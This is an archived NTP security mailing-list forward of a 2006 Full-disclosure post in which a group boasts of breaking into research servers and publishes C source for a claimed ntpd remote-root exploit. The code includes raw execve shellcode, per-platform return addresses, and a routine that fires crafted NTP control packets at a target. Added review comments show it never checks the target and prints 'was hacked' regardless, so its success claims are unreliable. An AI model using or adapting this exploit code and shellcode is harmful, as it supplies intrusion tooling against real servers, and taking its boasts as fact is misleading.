[ntp:security] [Fwd: Re: [ntp:hackers] re: [Fwd: [Full-disclosure] ntpd stack evasion 0day exploit]]

Danny Mayer mayer at ntp.isc.org
Tue Jan 10 23:21:03 UTC 2006



-------- Original Message --------
Subject: Re: [ntp:hackers] re: [Fwd: [Full-disclosure] ntpd stack evasion 0day exploit]
Date: Tue, 10 Jan 2006 22:11:34 +0000
From: Paul Vixie <paul at vix.com>
To: hackers at ntp.isc.org
CC: mills at udel.edu
References: <20060110220956.B284811426 at sa.vix.com>

here it is, for those who won't use the web interface to find the
attachment:

------- Forwarded Message

X-Account-Key: account4
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com;
	h=received:message-id:date:from:to:subject:mime-version:content-type;
	b=T2c2uh56Eb/LuJBvQlwy3KuZ+Ci6UE7C9juIB/a+9q2BZlHzbOuN8u6xeaO3a+ZISf/Lhldek4LxkscwjKLVMgSKarrTTksU7RKJeSiZD7/wTCqswfLKlLcWSpPP3KTyDZDQYMD4spxi9MB+1KKaCseAG8K6gkp5T9V9UqUA100=
Date: Tue, 10 Jan 2006 16:05:22 -0200
From: !bSt bitwarz Security Team <bitwarz at gmail.com>
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] ntpd stack evasion 0day exploit
Sender: full-disclosure-bounces at lists.grok.org.uk

We are a cell of pr0j3kt m4yh3m in Latin America and western Europe.
We have owned many research centers in Latin America, for example the
ntp server at Observatorio Nacional, USP and UFRJ, in Brazil, home of our
member
ronaldinh0 and in many european universities, especially those known by their
high-profile computer science departments. That's all. Keep the fucking
pr0j3kt m4yh3m
alive. Don't be confused by the evil words of
the CISSPs and white hats.

<-->ntpd_stack_evasion.c<-->
/* ntpd remote root no-exec stack evasion spl0it
 * by m0sk0v
 *
 * Ntpd is time protocol most used in *nix distros.
 *
 * Due to a buffer overflow in dump_srv.c is possible to execute
 * arbitrary code in remote host by setting "HUG=" variable
 * upon time protocol.
 *
 * This works even on stack protection using heap to
 * alock data
 *
 * 0day!!!!!
 * 0day!!!!!
 * 0day!!!!!
 * 0day!!!!!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 * PRIVATE! DONT LEAK THIS EXPLOIT!
 *
 *
 * Gr33tZ to :
 * Marcos Flavio Assuncao (defhack.com), Denny Roger/www.batori.com.br (thx
for
 * the shellcode, buddy!), ACME Security (www.acmesecurity.org), ksh
 *
 * [m0sk0v at cipsko m0sk0v]$ ./ntpd_stack_evasion.c -t2 localhost
 * ntpd_stack_evasion.c by m0sk0v
 *
 * Selected platform: RedHat Linux 9.0 with ntpd 4.0.99k-RPM (/tmp/sh)
 *
 * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
 * [1] <- evil query (pkt = 512 | shell = 45)
 * [2] <- null query (pkt = 12)
 * /tmp/sh was hacked.
 * [m0sk0v at cipsko m0sk0v]$ ls -al /tmp/suid-shell
 * -rwsr-xr-x    1 root     bin       512540 Aug 22  2005 /tmp/suid-shell
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>

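#define NOP    0x90    /* x86 single-byte NOP; doquery() pre-fills the whole packet with it */
#define ADDRS    8     /* doquery() stores ADDRS/4 copies of the ret value at buf+align */
#define PKTSIZ    512  /* size of the first (NOP-filled) datagram sent to UDP/123 */

/* Command-line usage text, printed via puts() by main() on an option error or
 * when the host argument is missing.  In the posted copy this literal had been
 * split across two lines by mail wrapping, which is not valid C; it is a single
 * line here. */
static char usage[] = "Use: ntpd_stack_evasion.c [-o offset] <-t type> <hostname>";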

/* generic execve() shellcodes */

/* Raw byte strings referenced only from targ[] below.  This program never
 * executes them itself: doquery() copies the selected one into the outgoing
 * datagram with strlen(), i.e. only the bytes before the first NUL (the
 * bsd_execve literal contains an embedded \x00).  The trailing ASCII paths
 * ("/tmp/sh", "/tmp/suid-shell") are the easiest thing to match on when
 * inspecting captured traffic or a host for artifacts of this tool. */
char lin_execve[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

char bsd_execve[] =
 /* specially made by denny at batori.com.br for ntpd_stack_evasion.c by m0sk0v
*/
 /* thanks for that, buddy! */
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/suid-shell\x01\x01"

"\x01\x01\x02\x02\x02\x02\x03\x00\x03\x03\x03\x9a\x04\x04\x04\x07\x04";

/*
 * One row of the target table (targ[]).  `ret` is the value doquery() stores
 * into the packet (main() adds the -o offset first); `align` and `shalign` are
 * byte offsets inside the PKTSIZ packet at which the ret copies and the `code`
 * bytes are placed.  Nothing in this file checks either offset against PKTSIZ.
 * `port` is tested only by main() to choose its final message; no code here
 * ever connects to it.
 */
struct platforms
{
    char *os;        /* printed by main() in the platform list and banner */
    char *version;   /* printed next to os */
    char *code;      /* byte string copied by doquery(), strlen() bytes */
    long ret;        /* stored ADDRS/4 times (as long) at buf+align */
    int align;       /* offset of the ret copies inside the packet */
    int shalign;     /* offset of the code bytes inside the packet */
    int port;        /* 0 in every row; only gates a message in main() */
};


/*
 * Target table: three rows plus an all-NULL terminator (main() lists rows
 * until .os == NULL).  The two FreeBSD rows differ only in ret.  Every row has
 * port == 0, and main() prints its "was hacked" line exactly when port is 0 —
 * so that line appears whenever the datagrams were sent, regardless of any
 * effect on the receiver.  The -t index from the command line is used on this
 * array without a range check.
 */
struct platforms targ[] =
{
    { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve,
        0xbfbff8bc, 200, 220, 0 },

    { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve,
        0xbfbff540, 200, 220, 0 },

    { "RedHat Linux 9.0", "4.0.99k-RPM (/tmp/suid-shell)", lin_execve,
        0xbffff777, 240, 160, 0 },

    { NULL, NULL, NULL, 0x0, 0, 0, 0 }
};

/*
 * Resolve `name` (dotted quad or hostname) to an IPv4 address in network byte
 * order, returned in a long.  On resolution failure the process exits with
 * status 1; there is no error return.
 *
 * Review notes (code left as posted):
 *  - inet_addr() returns in_addr_t (unsigned 32-bit).  Storing it in a long
 *    and testing `< 0` only catches INADDR_NONE where long is 32 bits; on LP64
 *    the value is never negative, so the gethostbyname() branch is unreachable
 *    and a non-numeric name yields 0xffffffff.
 *  - strerror() takes an errno value; h_errno codes belong to hstrerror().
 *  - gethostbyname() is obsolete; getaddrinfo() is the current interface.
 */
long getip(name)
char *name;
{
    struct hostent *hp;
    long ip;
    extern int h_errno;   /* <netdb.h> already declares this */

    if ((ip = inet_addr(name)) < 0)
    {
        if (!(hp = gethostbyname(name)))
        {
            fprintf(stderr, "gethostbyname(): %s\n",
                strerror(h_errno));   /* wrong error table, see header note */
            exit(1);
        }
        memcpy(&ip, (hp->h_addr), 4);   /* first address only, 4 bytes into a long */
    }

    return ip;
}

/*
 * Send two UDP datagrams to port 123 of `host`.  Returns 0 after both write()
 * calls succeeded, or -1 (after perror()) on socket/connect/write failure.
 *
 * Datagram 1: PKTSIZ bytes pre-filled with NOP, then q2 at offset 0, ADDRS/4
 * copies of `ret` (as long) at offset `align`, and `shellcode` (strlen bytes)
 * at offset `shalign`.  Datagram 2: q3 unchanged.
 *
 * Nothing is ever read back from the socket, so the return value only says
 * that the datagrams left this machine; it carries no information about what
 * the receiver did with them.  Neither align nor shalign is checked against
 * PKTSIZ, so out-of-range table values would write past buf.
 *
 * For anyone matching this on the wire: both datagrams start 0x16 (LI 0,
 * NTP version 2, mode 6 = control message), and q2 carries the ASCII text
 * "stratum=" at offset 12 immediately followed by a run of 0x90 bytes.
 */
int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
    /* tcpdump-based reverse engineering :)) */

    /* 12-byte NTP control header (byte 1 = 0x02, bytes 10-11 = 0x0136)
     * followed by the 8 ASCII bytes "stratum=". */
    char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
              0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
              0x74, 0x75, 0x6d, 0x3d };

    /* Second control header with a zero count field and no data. */
    char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
              0x00, 0x00, 0x00, 0x00 };

    char buf[PKTSIZ], *p;
    long *ap;
    int i;

    int sockfd;
    struct sockaddr_in sa;

    bzero(&sa, sizeof(sa));   /* legacy BSD call; memset(&sa, 0, sizeof sa) today */

    sa.sin_family = AF_INET;
    sa.sin_port = htons(123);
    sa.sin_addr.s_addr = getip(host);   /* getip() exits the process on failure */

    if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
    {
        perror("socket");
        return -1;
    }

    /* connect() on a UDP socket only fixes the peer address; each write()
     * below is then one datagram. */
    if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
    {
        perror("connect");
        close(sockfd);
        return -1;
    }

    memset(buf, NOP, PKTSIZ);        /* whole packet is 0x90, pieces overlaid below */
    memcpy(buf, q2, sizeof(q2));

    p = buf + align;
    ap = (unsigned long *)p;         /* cast type does not match ap's (long *) */

    /* ADDRS/4 == 2 iterations, each storing sizeof(long) bytes. */
    for(i=0;i<ADDRS/4;i++)
        *ap++ = ret;

    p = (char *)ap;                  /* dead store: p is not used again */

    /* strlen() stops at the first NUL byte of the selected table entry. */
    memcpy(buf+shalign, shellcode, strlen(shellcode));

    if((write(sockfd, buf, PKTSIZ)) < 0)
    {
        perror("write");
        close(sockfd);
        return -1;
    }

    /* %d with a size_t argument is a mismatched conversion (%zu matches). */
    fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
        strlen(shellcode));
    fflush(stderr);

        if ((write(sockfd, q3, sizeof(q3))) < 0)
        {
                perror("write");
                close(sockfd);
                return -1;
        }

    /* sizeof yields size_t; same %d mismatch as above. */
    fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
    fflush(stderr);

    close(sockfd);

    return 0;
}

/*
 * Entry point.  Options: -t <n> selects a row of targ[] (required), -o <n> is
 * added to that row's ret.  The single remaining argument is the host passed
 * to doquery().  Every exit path except a failed doquery() returns status 0,
 * including the usage and "no platform selected" paths.
 *
 * Review notes (code left as posted):
 *  - `type` comes straight from atoi() and indexes targ[] in the "Selected
 *    platform" fprintf() before any range check; targ[] has three real rows
 *    plus a NULL terminator, so -t 3 passes a NULL pointer to %s and larger
 *    values read past the table.
 *  - The host-argument check (argc != 1) runs after that indexing.
 *  - The final "/tmp/suid-shell was hacked." line is gated only on
 *    targ[type].port, which is 0 in every row, so it is printed whenever the
 *    two datagrams were sent.  Nothing in this program observes the remote
 *    host; the banner is not evidence of anything having happened there.
 */
int main(argc, argv)
int argc;
char **argv;
{
    extern int optind, opterr;   /* already declared by <unistd.h> */
    extern char *optarg;
    int ch, type, ofs, i;
    long ret;

    opterr = ofs = 0;            /* opterr = 0 silences getopt()'s own messages */
    type = -1;

    while ((ch = getopt(argc, argv, "t:o:")) != -1)
        switch((char)ch)
        {
            case 't':
                type = atoi(optarg);   /* unvalidated; see header note */
                break;

            case 'o':
                ofs = atoi(optarg);
                break;

            case '?':
            default:
                puts(usage);
                exit(0);           /* usage error still exits 0 */

        }

    argc -= optind;
    argv += optind;

    fprintf(stderr, "ntpd_stack_evasion.c by m0sk1t0\n\n");

    if (type < 0)
    {
        fprintf(stderr, "Please select platform:\n");
        for (i=0;targ[i].os;i++)
        {
            fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
            targ[i].os, targ[i].version, (void *)targ[i].ret);
        }

        exit(0);
    }

    /* targ[type] is dereferenced here with no upper-bound check on type. */
    fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
            targ[type].os, targ[type].version);

    ret = targ[type].ret;
    ret += ofs;                  /* -o offset applied to the table value */

    if (argc != 1)
    {
        puts(usage);
        exit(0);
    }

    fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
        (void *)ret, targ[type].align, targ[type].shalign);

    if (doquery(*argv, ret, targ[type].code, targ[type].align,
        targ[type].shalign) < 0)
    {
        fprintf(stderr, "Failed.\n");
        exit(1);
    }

    fprintf(stderr, "Done.\n");

    /* port is 0 for every row, so this branch is always taken. */
    if (!targ[type].port)
    {
        fprintf(stderr, "/tmp/suid-shell was hacked.\n");
        exit(0);
    }

    exit(0);
}
<-->ntpd_stack_evasion.c<-->

Thanks to Denny Roger @ Batori Software for his support

--
bitwarz Security Team  !bST
http://bitwarz.narod.ru

# Save a bug, kill a white hat!

-------- End Forwarded Message


